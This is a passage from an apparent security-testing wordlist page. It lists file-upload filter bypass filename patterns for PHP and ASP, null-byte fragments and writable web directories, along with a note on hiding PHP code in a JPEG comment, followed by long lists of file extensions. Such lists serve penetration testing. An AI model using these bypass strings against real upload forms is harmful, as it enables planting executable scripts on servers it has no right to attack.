%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
